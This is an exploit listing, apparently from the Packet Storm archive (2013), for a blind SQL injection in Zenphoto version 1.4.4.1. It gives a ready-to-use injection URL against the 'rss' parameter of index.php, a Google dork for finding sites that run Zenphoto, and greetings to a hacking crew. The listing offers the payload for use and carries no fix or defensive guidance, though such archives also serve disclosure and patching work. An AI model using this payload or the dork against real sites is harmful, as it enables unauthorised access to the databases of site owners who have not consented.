Zenphoto 1.4.4.1 Blind SQL Injection

2013-02-20T00:00:00
ID PACKETSTORM:120422
Type packetstorm
Reporter Hossein Nsn
Modified 2013-02-20T00:00:00

Description

                                        
                                            `######################################################################################  
# #  
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection #  
# #  
# Author : HosseinNsn #  
# #  
# Home : http://Emperor-Team.Org #  
# #  
# Software Link : http://www.zenphoto.org #  
# #  
# Security Risk : High #  
# #  
# Version : 1.4.4.1 #  
# #  
# Tested on : Linux - Windows #  
# #  
# Google Dork : "Powered by Zenphoto" #  
# #  
######################################################################################  
# #  
# Exploit : #  
# #  
# [Target]/index.php?rss=undefined+and+1%3D0&lang=en[Blind SQL Injection] #  
# #  
######################################################################################  
# #  
# SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N #  
# #  
# Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr #  
# #  
# Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir #  
# #  
######################################################################################  
`